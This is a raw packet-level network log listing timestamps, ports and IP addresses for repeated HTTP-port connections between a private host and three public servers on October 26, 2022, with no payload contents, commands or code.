Oct 26, 2022 13:20:26.975963116 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.975980997 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.976013899 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.976056099 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.976059914 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.976108074 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.976145029 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.976154089 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.976200104 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.976269960 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.976336002 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.987200975 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987255096 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987304926 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987340927 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987385988 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987385988 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.987422943 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987458944 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.987469912 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987515926 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.987557888 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.987648010 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.996215105 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996279001 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996362925 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996412992 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996458054 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996495962 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.996505022 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996551037 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996553898 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.996597052 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996642113 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996690035 CEST	80	49932	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:26.996691942 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.996751070 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:26.996849060 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:27.085170031 CEST	49932	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.100902081 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.122524977 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.122731924 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.123312950 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.123411894 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.143742085 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.143801928 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.143845081 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.143883944 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.143956900 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.143975019 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.144057989 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.144098043 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.144126892 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.144188881 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.144238949 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.144294024 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.144470930 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.164520979 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.164583921 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.164663076 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.164717913 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.164834976 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.164874077 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.164902925 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.164946079 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.164984941 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165055990 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.165215969 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.165256977 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165301085 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165338993 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165380955 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165421009 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165458918 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165494919 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165668964 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.165709972 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.185237885 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.185672045 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.185782909 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.185826063 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.186115026 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.186171055 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.645673990 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.645739079 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.645786047 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.645829916 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.645873070 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.645889044 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.645956993 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.645978928 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.646025896 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.646071911 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.646123886 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.646183968 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.657481909 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.657552958 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.657843113 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.666321993 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666398048 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666445971 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666491985 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666538954 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666579008 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.666623116 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666662931 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.666692019 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666738987 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666785955 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666793108 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.666848898 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666868925 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.666914940 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666965961 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.666994095 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.667032957 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.667078972 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.667093992 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.667144060 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.667181969 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.667207003 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.667346001 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.678280115 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.678390026 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.678448915 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.678498983 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.678569078 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.678723097 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.687448978 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687519073 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687566996 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687612057 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687657118 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.687691927 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687743902 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687750101 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.687805891 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687851906 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687864065 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.687920094 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.687964916 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688013077 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688019991 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688061953 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688091993 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688138008 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688182116 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688198090 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688244104 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688287973 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688353062 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688414097 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688422918 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688477993 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688523054 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688566923 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688585997 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688632011 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688664913 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688694000 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688740015 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688785076 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688801050 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688848019 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688894033 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.688909054 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.688956022 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.689001083 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.689033985 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.689064980 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.689097881 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.689131975 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.689177990 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.689228058 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.689239025 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.689383030 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.698805094 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.698873043 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.698919058 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.698965073 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.699009895 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.699054003 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.699096918 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.699141026 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.699270964 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.699332952 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.710663080 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.710726976 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.710777998 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.710822105 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.710858107 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.710901976 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.710947990 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.710978031 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.711014986 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711057901 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711093903 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.711118937 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711167097 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711211920 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711229086 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.711276054 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711312056 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.711338997 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711388111 CEST	80	49933	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:28.711419106 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:28.711481094 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:29.131824017 CEST	49933	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:30.147178888 CEST	49934	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:30.167068958 CEST	80	49934	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:30.167253971 CEST	49934	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:30.167327881 CEST	49934	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:30.223294973 CEST	80	49934	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:30.612739086 CEST	80	49934	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:30.612829924 CEST	80	49934	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:30.613121986 CEST	49934	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:30.613220930 CEST	49934	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:20:30.633280993 CEST	80	49934	51.91.236.193	192.168.11.20
Oct 26, 2022 13:20:35.614789009 CEST	49935	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:35.626529932 CEST	80	49935	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:35.626728058 CEST	49935	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:35.626868010 CEST	49935	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:35.638501883 CEST	80	49935	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:35.641061068 CEST	80	49935	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:35.641182899 CEST	80	49935	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:35.641309977 CEST	49935	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:36.629903078 CEST	49935	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:37.645953894 CEST	49937	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:37.658221960 CEST	80	49937	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:37.658457041 CEST	49937	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:37.658579111 CEST	49937	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:37.670548916 CEST	80	49937	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:37.672671080 CEST	80	49937	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:37.672729969 CEST	80	49937	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:37.672944069 CEST	49937	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:38.660912037 CEST	49937	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.676445007 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.688285112 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.688477993 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.689028978 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.689111948 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.701210976 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.701265097 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.701323986 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.701359987 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.701397896 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.701447010 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.701582909 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.701729059 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.701765060 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.702136993 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.703324080 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.713675022 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.713741064 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.713843107 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.713937044 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.714025974 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.714236021 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.714338064 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:39.714420080 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.714680910 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.726044893 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.726147890 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.726361036 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.726532936 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.726756096 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.726891994 CEST	80	49938	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:39.727075100 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:40.691689968 CEST	49938	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:41.707488060 CEST	49939	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:41.719574928 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.719990969 CEST	49939	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:41.721947908 CEST	49939	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:41.733628035 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736192942 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736326933 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736398935 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736453056 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736505032 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736531019 CEST	49939	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:41.736557961 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736605883 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:41.736843109 CEST	49939	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:41.737015963 CEST	49939	80	192.168.11.20	89.31.143.1
Oct 26, 2022 13:20:41.748724937 CEST	80	49939	89.31.143.1	192.168.11.20
Oct 26, 2022 13:20:46.753087997 CEST	49940	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:46.764301062 CEST	80	49940	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:46.764568090 CEST	49940	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:46.764714956 CEST	49940	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:46.775386095 CEST	80	49940	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:46.776602983 CEST	80	49940	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:46.776702881 CEST	80	49940	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:46.776829004 CEST	49940	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:47.768157005 CEST	49940	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:48.783920050 CEST	49941	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:48.795355082 CEST	80	49941	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:48.795655966 CEST	49941	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:48.795923948 CEST	49941	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:48.807332993 CEST	80	49941	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:48.808267117 CEST	80	49941	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:48.808379889 CEST	80	49941	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:48.808578014 CEST	49941	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:49.799196005 CEST	49941	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.814526081 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.825886965 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.826071024 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.826623917 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.826647997 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.826725960 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.837450981 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.837543011 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.837605953 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.837666035 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.837677956 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.837747097 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.837820053 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.837832928 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.837946892 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.838104963 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.838254929 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.838403940 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.848367929 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.848500967 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.848730087 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.848851919 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.848978996 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.848989010 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.849016905 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.849096060 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.849168062 CEST	49942	80	192.168.11.20	3.64.163.50
Oct 26, 2022 13:20:50.849356890 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.859918118 CEST	80	49942	3.64.163.50	192.168.11.20
Oct 26, 2022 13:20:50.860157967 CEST	80	49942	3.64.163.50	192.168.11.20
